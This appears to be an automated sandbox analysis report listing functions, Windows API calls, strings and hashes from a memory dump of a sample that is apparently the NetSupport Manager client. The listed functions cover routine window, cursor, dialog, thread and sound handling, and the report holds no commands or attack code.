Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ClientCountCursorFromPointTickWindow$RectScreen
String ID:
API String ID: 4245181967-0
Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60

Function 11025122 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(?,?,00000050), ref: 11025176
_strncat.LIBCMT ref: 1102518B
SetWindowTextA.USER32(?,?), ref: 11025198

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
SetFocus.USER32(?), ref: 11025265

Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
String ID:
API String ID: 3832070631-0
Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50

Function 110573B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 188libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,F3EE1E80,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000), ref: 110760A7
Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000), ref: 110760FC
Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000), ref: 11076105

LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
SetLastError.KERNEL32(00000078), ref: 110575F4
FreeLibrary.KERNEL32(00000000), ref: 110575FF

Strings

WTSGetActiveConsoleSessionId, xrefs: 110575D7
Kernel32.dll, xrefs: 11057585

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
API String ID: 3780373956-3165951319
Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64

Function 11093180 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78

Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12

GetWindowLongA.USER32(?,000000EC), ref: 110931C9
SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

GetWindowLongA.USER32(?,000000F0), ref: 11093220
SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110931B1, 110931DE, 11093208, 11093235
m_hWnd, xrefs: 110931B6, 110931E3, 1109320D, 1109323A

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3136964118-2830328467
Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54

Function 11137070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 111370A6
_free.LIBCMT ref: 111370DD

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

_free.LIBCMT ref: 1113716D

Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278

_free.LIBCMT ref: 1113713E

Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D

Strings

*HelpReqServer, xrefs: 111370F6
Client, xrefs: 111370FB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
String ID: *HelpReqServer$Client
API String ID: 1390041139-3616015116
Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5

Function 11143360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451

Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52

Beep.KERNEL32(00000000,00000000), ref: 11143415
MessageBeep.USER32(00000000), ref: 11143427
MessageBeep.USER32(-00000010), ref: 1114343B
MessageBeep.USER32(00000000), ref: 1114345D

Strings

1000,50, xrefs: 11143370, 11143393, 111433A7, 111433E8, 1114344C

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Beep$Message$PlaySound__isdigit_l
String ID: 1000,50
API String ID: 3904670044-1941404556
Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321

Function 110B9000 Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(75A77AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
GetCursorPos.USER32(110BFEBC), ref: 110B9026

Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C

PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Cursor$RectWindow$ClientForegroundLoadScreen
String ID:
API String ID: 3235510773-0
Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4

Function 1101D0F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D0FE
LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
RegisterClassExA.USER32(00000030), ref: 1101D181
GetLastError.KERNEL32 ref: 1101D187

Strings

0, xrefs: 1101D10C

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95

Function 11003310 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
GetSubMenu.USER32(00000000,00000000), ref: 11003343
DestroyMenu.USER32(00000000), ref: 11003372

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

hSub, xrefs: 11003359
..\CTL32\annotate.cpp, xrefs: 1100332E, 11003354
hMenu, xrefs: 11003333

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166

Function 11147110 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON

Download Yara Rule

APIs

OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
String ID:
API String ID: 180989782-0
Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91

Function 110B3090 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
